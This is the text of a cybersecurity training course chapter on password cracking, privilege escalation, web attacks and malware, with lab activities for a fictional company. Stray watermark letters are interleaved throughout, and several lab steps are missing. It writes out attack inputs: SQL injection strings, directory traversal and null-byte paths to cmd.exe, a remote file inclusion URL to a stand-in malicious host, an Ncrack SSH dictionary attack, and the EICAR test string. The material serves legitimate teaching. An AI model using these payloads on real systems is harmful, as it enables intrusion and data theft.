can craft their attack with a mask, which is just a simple placeholder for all the values you'd expect
to find in a given character. The mask for the first character might be a placeholder for all 26 letters
e
of the English alphabet in uppercase. The mask for the last four characters might be any number
between 1910 and 2010. Successful masking can significantly reduce the time it takes to brute force
at
a password; in this case, what might have taken hours or days will end up taking only minutes.
Password Storage
lic
How passwords are stored greatly affects the time it takes to crack them. Passwords stored as
cryptographic hashes are much less likely to be cracked than passwords stored in plaintext, which
up
can be trivial to crack. Not all cryptographic hashes are equal, however. The success of a cracking
attempt may depend on the standards the target organization has in place. Incorporating obsolete or
insecure hashing algorithms like MD5 will pose less of a challenge to an attacker than a strong
algorithm like SHA-512.
D
Privilege Escalation
ot
Once an exploit has been launched, one of the first objectives of an attack is typically to provide the Privilege Escalation
attacker with extensive access to the exploited system. This process is called privilege escalation. Example CVE IDs:
N
With privilege escalation, the user is able to obtain access to additional resources or functionality CVE-2016-0197,
that they are normally not allowed access to. One of the most common scenarios is when a normal CVE-2016-0180, and
user is able to exploit some vulnerability in a system to gain administrator or root-level privileges. CVE-2016-0161.
o
There are actually two distinct types of privilege escalation: vertical and horizontal.
Vertical privilege escalation, also called privilege elevation, occurs when a user can perform
D
functions that are not normally assigned to their role or explicitly permitted. A lower-privilege
application or user gains access to content or functions that are reserved for a higher-privilege-level
user, such as root or an administrator.
Horizontal privilege escalation occurs when a user accesses or modifies specific resources they
are not entitled to. For example, an attacker may be able to manipulate input parameters in a
vulnerable application to obtain other app users' private data.
e
ut
ib
tr
is
D
or
e
Figure 4-4: Comparing vertical and horizontal privilege escalation.
at
Social Engineering for One of the most powerful system hacking tools a hacker has in their arsenal is a non-technical one:
Systems Hacking social engineering. As you've seen, a social engineer can glean quite a bit of reconnaissance
information through trickery and deception. This can directly translate into a much more successful
up
and devastating system hack. Take, for example, an attacker who is able to trick an employee into
revealing access credentials to a customer database. The attacker pretends to be the IT help desk and
requests that the employee provide their user name and password so the attacker can verify their
security. The employee trusts the attacker's assumed authority and falls for this ploy.
D
Now, consider the alternative: the attacker would need to launch a series of complicated and
technical attacks to either brute force the password or somehow exploit a flaw in the database's
authentication systems. Neither of these possibilities is guaranteed to work, much less be achieved
ot
quickly and easily. Yet, through a simple confidence trick, the attacker got everything they needed to
infiltrate the database with minimal effort.
N
This is why hackers who employ social engineering at the onset are often so successful: the human
being is the weakest link in any system. Your technical controls are not strong enough to combat the
consequences of a poor or non-existent security culture in your organization.
o
D
• Kismet
• Ettercap
• Nagios Network Analyzer
Password crackers
• John the Ripper
• Cain & Abel
• THC Hydra
• pwdump
e
• Ophcrack
ut
• Medusa
• Ncrack
ib
Exploitation frameworks
• Metasploit Framework
• Core Impact
tr
• CANVAS
is
• w3af
• BeEF
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 4-1
Assessing the Impact of System Hacking
Attacks
e
Data File
ut
/home/kali/Desktop/top1000pass.txt
Activity: Assessing the
ib
Impact of System Before You Begin
Hacking Attacks
You'll be using your Kali Linux™ VM and Ncrack to crack your Windows Server® Administrator
password. Ncrack will perform an online password attack against the running SSH server, which has
tr
already been set up for you. The SSH server being used is OpenSSH. The dictionary list you'll be
using to crack the server is a text file of the top 1,000 commonly used passwords.
is
Scenario
D
Looking at reconnaissance attacks has led you to think about the next steps for the attackers going
after the Develetech network. The company has been lax in password policy before, and you decide
to see if an attacker could get easy access to your critical servers by cracking passwords. You'll
or
therefore perform an online password cracking attempt against your SSH server using a pre-
generated password dictionary. If you manage to breach the server, you'll see just how much damage
you can do with a successful hacking attack.
e
at
b) Enter ncrack
c) Review the syntax for running the command, as well as the various options.
dictionary of passwords, you will be using the -P flag to point Ncrack to the
dictionary file.
Consider asking
D
students why they would 2. Use Ncrack to crack the server's Administrator password through SSH.
use the cd option. The
a) At the prompt, enter the following:
answer: to get around
ot
e
While Ncrack is running
Note: The cracking process will take less than a minute. the cracking attempt,
ut
have students go to
steps 3 and 4.
ib
3. While Ncrack runs the cracking process, open top1000pass.txt from the
desktop.
tr
4. Do you know anyone who uses one of these passwords?
is
A: Answers will vary, but most people know at least one person who uses common, insecure
passwords like these.
D
5. Log in to the SSH server using the credentials you just cracked.
a) When the password crack finishes, verify that Ncrack has identified the Administrator password—
Pa22w0rd.
Caution: Be careful when inputting the password, as the characters will not
appear for you to check.
o
Note: Because you are using SSH to connect to the server, you will be issuing
Windows commands.
b) Verify that you're develetech\administrator.
c) Enter whoami /priv
This will show you all of your privileges. Note that creating and deleting objects are among these.
d) Enter cd Desktop
e
e) Enter dir to list the files on the server's desktop.
ut
f) Enter echo You have been PWNed! > Gotcha.txt
g) Enter dir again and verify your Gotcha.txt file is listed.
h) Switch to your Windows Server 2019 computer, log in, and open the Gotcha.txt file on the desktop.
ib
Confirm your message is there, and then close the file.
tr
7. What other harm could the attacker do with this access?
A: Answers will vary, but the options are almost limitless—they could delete files, install programs,
is
and download malware for just a few examples.
D
8.
A: Answers may vary, but the most pressing issue is to enforce a stronger password policy that
rejects such a common and simple password, especially for the administrator. You can also limit
9.
or
the number of password attempts or disable SSH connections entirely.
TOPIC B
Assess the Impact of Web-Based Attacks
Attacks that target web-based infrastructures, like browsers and web servers, are some of the most
common cyber attacks today. In this topic, you'll assess the significant impact these types of attacks
can have.
e
ut
Client-Side vs. Server-Side Attacks
Attacks launched on web-based resources are categorized as either client- or server-side exploits. Client-Side vs. Server-
ib
Client-side attacks target the user who is attempting to access resources from a server, usually Side Attacks
through the client's browser. Client-side exploits typically depend on social engineering, relying on
tr
users to inadvertently compromise their system or connection. For example, a client-side exploit
might convince the user to select a link or button to perform a seemingly innocent task. In a web
is
page, this might launch a JavaScript function that executes malicious code on the user's browser,
causing the browser to crash.
D
Server-side exploits specifically target the computers that host web-based content. Although they
can manifest themselves on the client end, the issue is localized on the server. Certain attacks can
enable an attacker to execute malicious scripts on the server, and any further content it serves to
or
other clients can be compromised. For example, an attacker may be able to inject malicious code
into a web application, affecting anyone who loads the web app from the server.
In a cross-site scripting (XSS) attack, an attacker takes advantage of scripting and input Cross-Site Scripting
validation vulnerabilities in web apps to attack legitimate users in three different ways: (XSS)
• In a stored attack, the attacker injects malicious code or links into a website's forums, databases, Example CWE IDs:
lic
CAPEC-86,
server. This request includes the attacker's malicious script. The attacker sends a link to the CAPEC-106, and
victim with this request, and when the victim clicks this link, the malicious script is sent to the CAPEC-243.
legitimate server and reflected off it. The script then executes on the victim's browser.
D
• In a Document Object Model (DOM)-based attack, malicious scripts are not sent to the
server at all; rather, they take advantage of a web app's client-side implementation of JavaScript
to execute their attack solely on the client.
ot
In a cross-site request forgery (XSRF)/(CSRF) attack, an attacker takes advantage of the trust Cross-Site Request
established between an authorized user of a website and the website itself. This type of attack Forgery (XSS) (2 Slides)
o
exploits a web browser's trust in a user's unexpired browser cookies. Websites that are at the most Example CWE ID:
risk are those that perform functions based on input from trusted authenticated users who CWE-352.
D
authenticate automatically using a saved browser cookie stored on their machines. The attacker takes Example CAPEC IDs:
advantage of the saved authentication data stored inside the cookie to gain access to a web browser's CAPEC-62,
sensitive data. CAPEC-462, and
CAPEC-467.
This functionality is found on most web pages and is enabled when a user logs in to access account
information. If, when logging in, the user selects the Remember Me option, then a cookie is saved
and accessed the next time they visit that web page. For example:
1. A victim logs in to their banking website, bank.example, choosing the Remember Me option.
e
ut
ib
tr
is
D
or
Figure 4-5: An example of an XSRF attack.
e
XSRF attacks are extremely difficult to detect and perform forensics on, since the attack is carried
at
out by the user's browser just as it normally would be if the user themselves made the request. It is
almost impossible to distinguish a successful XSRF attack from normal user activity.
lic
Command Injection
up
SQL Injection Command injection, also called code injection, is an attack that introduces malicious code into a
Example CAPEC IDs: vulnerable application to compromise the security of that application. An attacker who injects
CAPEC-7, CAPEC-88, malicious code into a web app or web page can cause a denial of service incident, retrieve
and CAPEC-248. information they are unauthorized to view, install malware, or escalate privileges on the server. One
D
Consider demonstrating of the most popular types of command injections is SQL injection.
www.altoromutual.com.
Almost every web application employs a database backend to store whatever kind of information it
This is a fake banking
ot
website that can be used needs to operate. To gain access to the information stored within the database, the application may
to test command use Structured Query Language (SQL) to communicate. SQL is the most common language that
injection, among other applications use to interact with a database to perform four basic functions. These functions are:
N
web-based threats. selecting data from the database, inserting data into the database, deleting data from the database,
There are several videos and updating data within the database. In an SQL injection attack, an attacker can modify one or
on YouTube that more of these four basic functions by embedding code in some input within the web app, causing it
o
demonstrate how to to execute the attacker's own set of queries using SQL.
"attack" the site.
D
To identify SQL injection vulnerabilities in a web app, an attacker must test every single input to
include elements such as URL parameters, form fields, cookies, POST data, and HTTP headers. The
simplest and most common method for identifying possible SQL injection vulnerabilities in a web
app is to submit a single apostrophe and then look for errors. If an error is returned, the attacker
will look to see if it provides them with SQL syntax details that can then be used to construct a
more effective SQL injection query. If the single apostrophe returned an error message, the attacker
may also try submitting two apostrophes, and if no error is returned, then the input being tested is
most likely vulnerable to SQL injection. Attackers may also carry out injections by using the SQL
wildcard character (%) to look for a large amount of data sets, or they may submit a mathematical
expression equivalent to the expected value to expose some vulnerability within the app.
e
ut
ib
tr
is
D
or
e
at
Figure 4-6: A simple SQL injection statement dumping an entire list of products. This happens
lic
Example
up
An organization's public-facing web app uses simple HTML forms and Cascading Style Sheets (CSS)
to ask for a user name and password to access the app. This web app accesses an SQL database of
credentials to validate the user name and password input. If you have a user, John, with a password
of !Pass1234, then the following is what a typical SQL query would look like:
D
returned by the database server. The attacker now knows they need to complete the SQL statement
with a syntactically correct query. To do this, the attacker uses a value that is always true, such as
D
1=1, and then uses the built-in capability to insert inline comments within the query by inputting the
-- characters. The -- characters are used within the SQL language to denote comments, and the
SQL database query engine will ignore anything following them. This is what the SQL injection
exploit string ' or 1=1-- would look like when the attacker inserts it into the user name form field:
SELECT * FROM tbl_user WHERE username = '' or 1=1--' AND password '!Pass1234'
The SQL syntax is now correct, and the database will not return an error if this SQL statement were
sent to it. Instead, the database will return every single one of its lines, since the 1=1 statement is
always true.
Parameterized Queries
Most secure websites with an SQL backend will incorporate a technique called parameterized
queries to defend against SQL and other code injection attacks. A query is parameterized when it
incorporates placeholders for some of its parameters. Later, when the query is executed, the web
app binds the actual values to these parameters in a different statement. So, a quotation mark in a
e
parameterized query would be interpreted literally, rather than interpreted as if it were a part of the
ut
query structure. Parameterized queries are also called prepared statements.
Directory Traversal
ib
Directory Traversal Directory traversal is the practice of accessing a file from a location that the user is not authorized
tr
Example CAPEC IDs: to access. The attacker does this by ordering an application to backtrack through the directory path
CAPEC-126 and so the application reads or executes a file in a parent directory. The most simple example of
CAPEC-213. directory traversal involves sending a ../ command request to the application or application
is
programming interface (API), which then traverses up one parent directory for each one of these
commands. This command is applicable to both Unix-like and Windows systems, but Windows
D
systems also accept ..\ as the traversal command.
Directory traversal causes the most damage when attackers are able to traverse all the way back to
the root to execute basically any command or program in any folder on the computer. However, this
or
will only work if the application has been given the privileges to access such folders. Likewise, many
web apps will detect query strings containing traversal characters. So, assume an attacker tries to
open a command prompt on the server hosting the web app. If the attacker sends a GET request to
e
the server with multiple traversal commands (../../Windows/system32/cmd.exe), then the
application may block the request.
at
Still, if the attacker encodes the traversal command in a URL encoding scheme, then they may be
able to bypass this security mechanism. For instance, %2E is equivalent to . (period) and %2F is
lic
any number of attacks that can harm both the server itself and its connecting clients.
File Inclusion
D
File Inclusion In a file inclusion attack, the attacker adds a file to the running process of a web app or website.
Example CAPEC IDs: The file is either constructed to be malicious or manipulated to serve the attacker's malicious
CAPEC-193 and purposes. In either case, a file inclusion attack can lead to a number of security incidents, including:
ot
CAPEC-242. malicious code executing on the web server, malicious code executing on the client that accesses the
server, sensitive data leaking, or a denial of service. There are two basic types of file inclusion:
N
type of attack. An attacker could, for instance, force a parameter in a web page to call an external
malicious link that includes the compromised file. As an example, consider a page built in PHP that
D
does not properly filter arbitrary values added to page parameters. The PHP code includes a FONT
parameter that has five different options, each one a different font type. The attacker can manipulate
this parameter to inject an option that isn't one of these five—and not only that, the attacker can
point to an external URL that contains a malicious PHP file:
/webpage.php?FONT=http://www.malice.example/malware
In local file inclusion (LFI), the attacker adds a file to the web app or website that already exists
on the hosting server. This is often accomplished on servers vulnerable to directory traversal; the
attacker navigates through the server's file structure and executes a file. As in the directory traversal
example, an attacker could gain control over the server by opening a command prompt. A common
tactic used in LFI is introducing a null character (%00 in URL encoding) at the end of the request to
bypass security mechanisms that automatically add a .php suffix to the request. This enables the
attacker to access non-PHP files:
/webpage.php?FONT=../../Windows/system32/cmd.exe%00
e
Additional Web Application Vulnerabilities and Exploits
ut
The following table lists some additional web app vulnerabilities and exploits that target them. Additional Web
Application
ib
Vulnerability or Exploit Description Vulnerabilities and
Exploits
Session fixation Session fixation is forcing a user to browse a website in the context of a
tr
known and valid session. An attacker attempting a session fixation attack
needs to force an already known session onto the targeted user. To carry
is
out this attack, an attacker can manipulate the methods normally assigned
to a user, such as providing alternative inputs to web applications via
GET requests. Some web applications assign these values via GET
D
requests directly to the user's cookie for backward compatibility reasons.
An alternative, and more popular, method for carrying out a session
Session prediction
or
fixation attack is to use an XSS attack to set the session cookie directly
with a client-side scripting language such as JavaScript.
Session prediction attacks focus on identifying possible weaknesses in the
generation of session tokens that will enable an attacker to predict future
e
valid session values. If an attacker can guess the session token, then the
at
page link that is different than where they had intended to go. After the
victim clicks the link, they may be redirected to what appears to be a
legitimate page where they input sensitive information. A clickjacking
attack can also redirect a user to a malicious web page that runs harmful
up
Cookie hijacking Because session cookies are generally configured and transmitted across
the communications channel between the client and the server as a simple
N
text file, an attacker can hijack a cookie to inject malicious code they can
use to take control of the session. Once the session is hijacked, the
attacker can propagate a DoS attack against the web app or sign in to the
o
web app using the victim's name, the client computer, or both.
D
Cookie poisoning Cookie poisoning modifies the contents of a cookie after it has been
generated and sent by the web service to the client's browser so the newly
modified cookie can be used to exploit vulnerabilities in the web app.
e
these web services can have a significant impact on the security of your organization.
ut
Exploit Description
Probing This attack is typically a preliminary step to test web services. Essentially,
ib
the attacker relies on brute force to try to find what sort of requests web
services are vulnerable to. For example, the open nature of WSDL
tr
documentation may enable an attacker to view all of a web service's
functions. Attackers can use this information to craft every variety of
is
operation and request message that applies to the service until it reveals a
breach. The attacker can also inject special characters into a WSDL
request parameter to cause unintended behavior, like a systems crash.
D
Coercive parsing SOAP parses XML-based requests. Those requests can be modified by an
attacker so the SOAP web service parses them in a harmful way. For
or
example, a hacker can craft a payload that requests the same thing over
and over, send a single payload over and over, or craft a payload that is
excessively large to trigger a DoS condition and bring down the web
service. Intrusion countermeasures may be unable to pick up on packets
e
crafted maliciously, as the source of the packet and its XML formatting
are likely to be valid.
at
External references Poorly configured SOAP services can open the door to a number of
external-based exploits. If the SOAP documentation allows XML input
lic
from a third party, that third party can take advantage of this and cause
damage, such as using a DoS attack. Attackers can also corrupt the XML
schema, which helps parse XML requests, if that schema is stored where
up
spreadsheets can include macros or other content that can cause a whole
host of problems.
SQL injection SQL statements that access, modify, or delete records in an SQL database
N
records.
D
• Burp Suite
• OWASP WebScarab
• OWASP ZAP
• w3af
• BeEF
• Nikto
• Paros Proxy
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
ACTIVITY 4-2
Assessing the Impact of Web-Based Threats
Data Files
e
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments
\devtech_store.sql
ut
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\devtech_site.zip
Activity: Assessing the
ib
Impact of Web-Based Before You Begin
Threats
An SQL-based web server has already been set up on your Windows Server machine. This web
tr
server is running with XAMPP open source software.
is
Scenario
Develetech's storefront website was unfortunately published in a hurry, and not much attention was
D
paid to securing the site. You're especially concerned that the site is vulnerable to injection attacks
on its SQL database. An attacker may be able to hijack an account in the database to deface the site
or tamper with the product data. So, you'll test the website's vulnerabilities to SQL injection to
Note: You may need to select the Show hidden icons arrow to see the icon. If
no icon appears, select the Windows Start button, then select
XAMPP→XAMPP Control Panel.
D
b) In the XAMPP Control Panel, ensure that both Apache and MySQL are running. Both services will
have a green background and port numbers listed if they are running. If they aren't running, select
the Start button next to each service.
c) Next to MySQL, select Admin.
ot
N
o
D
e
ut
ib
tr
is
D
e) In the File to import section, select the Browse button.
or
e
Note: The name of this button may differ based on web browser.
at
b) Verify that there are three tables in this database: categories, products, and users.
c) Select the categories table and review its data.
This table is a list of the product categories. The id column is the primary key, and the name column
N
lists the name of each product category. There are a total of nine categories.
d) From the navigation pane, select the products table and review the data.
This table is a list of all products. Each product has its own product code, description, price, and
o
This table is a list of users that can sign in to the website. Each user has a user name, password,
first name, last name, and permission.
e
ut
ib
tr
is
D
4. Use a basic injection attack to dump all products in the database.
a) Select the Catalog tab.
b) Verify that all products in the Monitors category are listed in a table.
or
c) Select some of the other category navigation tabs.
The intended behavior of this page is to list only one product category at a time, depending on which
category the user wants to see.
e
d) Verify that the URL includes the query category=n, where n is the product category id you're
currently viewing.
at
lic
e) Place the insertion point at the end of the URL, and then add a space.
f) Type OR 1=1
up
D
g) Press Enter.
ot
N
o
D
h) Verify that the page is saying that it's listing products in the Monitors category, but that it's actually
listing every product in every category.
e
ut
ib
tr
is
D
i) or
In the SQL query section, examine the query that you executed with this injection.
The query selects four columns from the products table where the product category is n or where 1
equals 1. Because 1 equals 1 is always true, the page dumps every category at once.
e
at
b) Verify that there's a user name and password field on this page, as well as a Sign in button.
c) Attempt to sign in as user kevin with the password Pa22w0rd.
The kevin account is listed in the users table in the SQL database. Kevin has default user
permissions.
up
6. On the web page, look at the SQL query this attempt executed on the server.
How does the form automatically format the user name and password fields in
e
the query?
ut
A: It adds an opening and closing apostrophe for each field, encasing the field in a string literal.
ib
a) Type kevin as the user name, and in the password field, type x' OR 'x'='x
As before, you're attempting to exploit an always true condition. Since you're inputting the query in a
form, you need to manipulate it with apostrophes. This is because the query will be run with its own
tr
opening and closing apostrophes, so you need to ensure the entire statement isn't enclosed in one
long string. In other words, the query should be saying: "Use x as the password. Failing that, the
is
password is a true statement."
b) Select Sign in, then verify that you are logged in, but not as Kevin.
D
or
The "always true" statement applies to every row of the users table, so it logs you in as the first user
in that table. In this case, the first user is Laura Anderson, who has administrator privileges. It's
common for the first accounts in a database of users to have administrator privileges.
e
Consider demonstrating c) In the SQL query section, verify that the query was formatted insecurely, enabling your injection
that, other than the attack to work.
at
Your malicious query takes advantage of the default apostrophe formatting and lack of sanitized
input.
8. What are some other ways an attacker could compromise the database with
D
SQL injection?
A: Answers may vary, but the attacker could drop entire tables, edit individual row entries, dump the
contents of the members table to see more user login information, and even log in as specific
ot
users.
9.
A: Answers may vary, but one of the most common and useful tactics to deal with SQL injection is
the use of parameterized queries, also known as prepared statements. The quotation marks in the
o
sign-in injection, for example, would be interpreted literally if the query were parameterized.
D
TOPIC C
Assess the Impact of Malware
You've considered how your systems will deal with the threat of system hacking attacks and attacks
that target web apps and websites. Now you'll examine the threat of malicious software, which, if
you're unprepared, can bring swift and devastating harm to your systems.
e
ut
Malware Categories
Malicious software, or malware, comes in a variety of forms. Malware Categories
ib
Inform students that
Malware Type Description modern malware often
uses combined attack
tr
Virus A piece of code that spreads from one computer to another by attaching approaches that span
itself to other files through a process of replication. Viruses require multiple categories.
is
human intervention to spread. The code in a virus executes when the file
it is attached to is opened.
D
Worm Like a virus, a worm replicates across the infected system. However,
unlike a virus, it does not require human intervention and can replicate
itself. Also, it does not attach itself to other programs or files.
Adware
Spyware
advertisements when it is used. or
Software that automatically displays or downloads unsolicited
to obtain.
Trojan horse Hidden malware that causes damage to a system or gives an attacker a
platform for monitoring and/or controlling a system. Trojans typically
lic
Rootkit Code that is intended to take full or partial control of a system at the
lowest levels. Rootkits often hide themselves from system processes,
running invisibly.
D
Logic bomb A piece of code that sits dormant on a target computer until it is triggered
by a specific event, such as a specific date. Once the code is triggered, the
ot
Trojan Techniques
Trojan Techniques Trojans are insidious and remain undetected much more easily than a typical virus. They are usually
Inform students that propagated by social engineering, such as when a user downloads an email attachment that claims to
botnets will be covered be benign, but is actually malignant. Even seasoned IT professionals fall victim to Trojan horse
in an upcoming topic. deceptions. For example, you might search online for a PowerShell script to help you accomplish
some domain user management task. Although it's common to reuse code, unless you trust the
source of the script and can actually take the time to evaluate the code itself, you may fall prey to a
Trojan—even if the script works as advertised.
e
Trojans may also be packaged in drive-by downloads, where a user unwittingly downloads the
ut
malicious code along with what they think is legitimate software.
Trojans can have many purposes. Some are meant to simply deny service to a user by crashing or
locking up their computer, whereas others delete or corrupt data. Other Trojans can log keystrokes
ib
and intercept transmissions to steal sensitive data from a user. It's also common for Trojans to
contain bots used to turn a computer into part of a larger botnet.
tr
is
D
or
e
at
lic
up
Figure 4-7: An email message meant to trick a user into downloading a Trojan to their computer.
D
Techniques through social engineering tactics. A user may believe they're downloading or opening a legitimate
You may wish to point application, but they are also executing the virus code when they do so. Depending on how the
out that an alternate user's operating system is configured, the attacker may attempt to trick the user into opening a file
N
definition for an armored type that is typically benign (like an image), but if file types are hidden, they are actually opening an
virus is any virus that is executable file.
difficult to remove. Some
o
sources refer to viruses Viruses can reside in RAM during the duration that the computer is on, or they can infect their
that obscure their true targets without moving to memory. Some viruses are able to infect the master boot record (MBR) of
D
location as stealth an operating system or installation media. More sophisticated viruses do a better job of hiding from
viruses. users and anti-malware software. Polymorphic viruses, for instance, change their code each time
they infect a new file, making it very difficult for anti-malware to keep up. Armored viruses obscure
their true location in a system by misleading the anti-malware system into thinking it resides
elsewhere. This prevents anti-malware software from accurately detecting and removing the
infection. Likewise, armored viruses often contain obfuscated code to make it more difficult for
security researchers to properly assess and reverse engineer them.
e
ut
ib
tr
is
Figure 4-8: A virus changing its code each time it spreads to a new file.
D
Frequently, viruses are intended to enable further attacks, send data back to the attacker, or even
corrupt or destroy data. Because of their replicating nature, viruses are difficult to completely
remove from a system, and account for billions of dollars of damage every year.
or
Whereas viruses tend to interfere with the functions of a specific machine, worms are often
intended to interrupt network capabilities. A worm need not carry any sort of malicious payload at
all—its primary function is usually just to spread. The act of spreading to enough systems may
e
cripple network bandwidth. Worms that do carry payloads often turn computers into remote
zombies (bots) that an attacker can use to launch other attacks from.
at
Adware often appears on a user's computer as a browser pop-up. While not all adware is overtly Adware and Spyware
malicious, many adware programs have been associated with spyware and other types of malicious Techniques
up
software. Also, it can reduce user productivity by slowing down systems and simply being an Consider mentioning
annoyance. that some spyware is
authorized, such as
Spyware is more problematic, however. The data collected by spyware can include web browsing when an organization
history, personal information, banking and other financial information, and user names and
D
legitimate software.
Effective adware and spyware are designed to have little to no effect on performance so they are
more difficult to detect. However, victims who are exposed to this type of malware are often
N
infected multiple times, and the effect eventually becomes noticeable. Some types of spyware are
able to bypass anti-malware software, as well as disable software firewalls.
o
Unsurprisingly, social engineering techniques like phishing are the most common vector used to Ransomware
propagate a ransomware attack. The victim opens a link or attachment that downloads a Trojan Techniques—Vectors
horse onto their device, which contains the ransomware payload. Some ransomware attacks succeed and Warnings
without social engineering, such as those that enter the network through a flaw in software. In either
case, the payload can affect files directly on the local device, or it can also spread to any network
shares that are mapped on that device, causing significantly more damage to the wider organization.
Not all ransomware payloads are the same, though they usually all make themselves known to the
victim by displaying an application window warning the user their files are locked and cannot be
recovered without payment. These warnings are usually eye catching and meant to scare the victim.
They often accuse the victim of doing something embarrassing or illegal, and claim that the victim is
being punished for it (e.g., by law enforcement).
e
ut
ib
tr
is
D
or
e
at
lic
Figure 4-9: An example of what a ransom warning might look like in a ransomware payload.
Ransomware Techniques—Payloads
up
Ransomware When it comes to the payload itself, the more rudimentary attacks simply add OS-level restrictions
Techniques—Payloads to the system or files, such as changing file permissions or pointing the Windows Shell to itself.
These are more nuisances than real threats, as an experienced user can get around them. But
D
inexperienced users often can't, and therefore decide to pay the ransom. Some payloads even do
nothing—they just claim to lock a victim's files, which is enough to scare the victim into payment.
ot
More sophisticated ransomware will affect the system at a lower level, such as rewriting the master
boot record (MBR) or the boot drive's partition table to prevent the operating system from booting.
The ransom itself may then come through a different channel, like an email message that the victim
N
1. The attacker generates a public–private key pair and adds the public key to the payload. When
D
the payload executes on the victim's device, it encrypts their files with a symmetric key, which is
then encrypted by the attacker's public key.
2. The symmetric key and the original plaintext data is destroyed, leaving only the encrypted data
and a bit of asymmetric ciphertext. This asymmetric ciphertext is displayed to the victim in the
ransom message.
3. The victim sends this ciphertext, along with payment, to the attacker. The attacker uses their
private key to decrypt the ciphertext, which reveals the symmetric key.
4. The symmetric key is sent back to the victim, who uses it to decrypt their data.
e
ut
ib
tr
is
Figure 4-10: The ransomware encryption process.
D
Ransomware Techniques—Payment
or
The last factor in the ransomware process is payment. The most successful ransomware propagators
follow through on their promise to decrypt the victim's data, as it costs them very little to do so, and
simply taking the money without fulfilling their promise to decrypt would make future victims less
Ransomware
Techniques—Payment
e
likely to pay. The ransomware propagator will usually request payment in the form of a
cryptocurrency like Bitcoin, but may also allow the victim to pay through pre-paid vouchers or
at
through wire transfers that go directly to a cash office, eliminating the need for a traceable bank
account.
lic
For victims who refuse to pay, the ransomware propagator usually includes a threat to destroy the
private key if payment is not received in a timely manner, thereby keeping the victim's data
encrypted forever. Again, they may or may not follow through on this threat, though it will help
up
A supply chain attack is an attack that targets the end-to-end process of manufacturing, Supply Chain Attack
distributing, and handling goods and services. The supply chain most often starts with a company Example CAPEC IDs:
ot
that supplies raw materials to an original equipment manufacturer (OEM). The OEM or another CAPEC-442,
company then distributes the product, usually as part of a larger product suite. The product is CAPEC-444,
distributed to a vendor, who in turn sells the product to a customer, ending the chain. For example, CAPEC-447, and
N
Intel CPUs are used in Asus laptops, so Intel is considered an OEM. CAPEC-522.
Because supply chains are so crucial to normal business operations, and affect so many different
companies, an attack on the chain can have a profound ripple effect on organizations and personnel
o
further down the chain. An attacker can tamper with the devices used at the manufacturing level,
D
which impacts distribution, which impacts the vendor's ability to sell the product, which ends with
frustrated consumers and lost revenue. Common targets at the manufacturing level include industrial
control systems (ICSs), factory power systems, inventory systems, and any other computer or device
that must remain operational for the supply chain to maintain its forward momentum.
The details of an attack can differ, but most attacks involve physically tampering with devices,
hacking into them and installing malware, or both.
Note: A supply chain attack is a type of out-of-band attack, which implies that attackers use
unconventional, irregular, or indirect means to compromise an organization.
e
ut
ib
tr
Figure 4-11: A supply chain attack introducing malware at the manufacturer, which has an
increasing effect further down the chain.
is
Example Supply Chain Attacks
D
One example of a supply chain attack is Stuxnet, a worm targeting systems used in control
machinery that handles nuclear material. The worm was able to propagate through an infected USB
drive physically plugged into a system. When the machinery was put to use further down the supply
or
chain at the consumer end, the worm would overload the machinery, damaging it.
In 2013, attackers installed malware on Target's point of sale (POS) systems, enabling them to steal
millions of customers' credit card information. Investigators believe the attackers stole credentials to
e
Target's network from one of the company's HVAC suppliers. No matter how the attackers stole
the credentials, the fact they were able to compromise a supplier meant the damage was magnified
at
company that supplies IT services to many government agencies. The customers who used
SolarWinds' products were likewise impacted further down the chain.
An organizational supply chain is not just vulnerable to malware-based attacks. For example,
software-based attacks like buffer overflow and command injection have also targeted supply chains.
Attacks of these types can modify the design of a product, and, as the product reaches the
D
consumer, it will be different than what was intended. Depending on the nature of the attack, these
design changes may go completely unnoticed, or they may only be apparent when the product is far
enough down the chain it cannot be entirely recalled.
ot
Malware Tools
N
Malware Tools The following are examples of popular tools attackers may use as malware:
• NetBus
o
• Sub7
D
• Back Orifice
• Zeus
• FinFisher
• MPack
ACTIVITY 4-3
Assessing the Impact of Malware
Data File
e
C:\CNX0013Data\Analyzing Attacks on Computing and Network Environments\eicar.txt
ut
Activity: Assessing the
Before You Begin Impact of Malware
You will activate a text file on your Windows 10 client that is designed to simulate malware, but it
ib
won't harm your system.
Scenario
tr
You are growing concerned about the volume of malware undoubtedly striking Develetech as the
is
company rapidly grows. Is your anti-malware sufficient to discover these attacks? You need to
identify what the latest threats are and test your end-station anti-malware to ensure that it works
properly.
D
Examine the top malware threats in 2021 according to Sophos, a British
1.
cybersecurity firm.
a) Return to your Windows 10 client.
or
b) Open your web browser and navigate to https://www.sophos.com/en-us/medialibrary/pdfs/technical-
e
papers/sophos-2021-threat-report.pdf.
at
Note: You can also use the search site of your choice to search for sophos
2021 threat report then select the PDF from the results if you'd rather not type
lic
A: Sophos implies that there is a hierarchy (or weight classes, to use their metaphor) to modern
ransomware attacks. Attacks on a few large corporations tend to skew the averages because
ot
these corporations can afford to pay a much larger ransom—and attackers know it. Attacks on
smaller organizations and individuals are less profitable, so those payouts tend to remain
constant.
N
e
a) Open a new web browser tab.
ut
b) Navigate to the web search site of your choice and search for malware predictions for <current year
or following year>
c) From the results, select a link that provides some predictions for how malware will evolve and
ib
continue to spread.
tr
What categories of malware do security researchers believe will be
is
prominent? What new categories of malware might arise? What new or
changing delivery mechanisms and attack vectors might malware take? What
D
other predictions about malware did you discover?
A: Answers will vary greatly depending on the time when the class is taught and what web-based
or
resources you find. Ransomware will likely continue to be prominent well into the future, especially
attacks targeting the healthcare industry. Malware may take advantage of artificial intelligence (AI)
to better avoid detection and cause more harm. Malware targeting edge devices like those used in
IoT and remote work is also likely to grow in prominence.
e
7. Test your workstation anti-malware by activating the simulated malware file,
at
eicar.txt.
a) From the course data files, open eicar.txt in Notepad.
lic
TEST-FILE!" to the console. Many anti-malware vendors have agreed to incorporate this file's
signature in their products for testing purposes.
c) In the text file, remove the opening bracket at the beginning and the closing bracket at the end of the
string.
ot
The brackets are not part of the actual "malicious" string; they were included to keep the file inert
until now. Removing the brackets reveals the true EICAR test string, which is:
N
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
d) Save the file.
e) Select the Windows notification that pops up, informing you that a threat was detected.
o
Note: If you missed the notification, select the Notification icon on the right-
D
e
ut
ib
tr
is
D
or
e
at
9. What alert level did Windows Security assign the threat? What category of
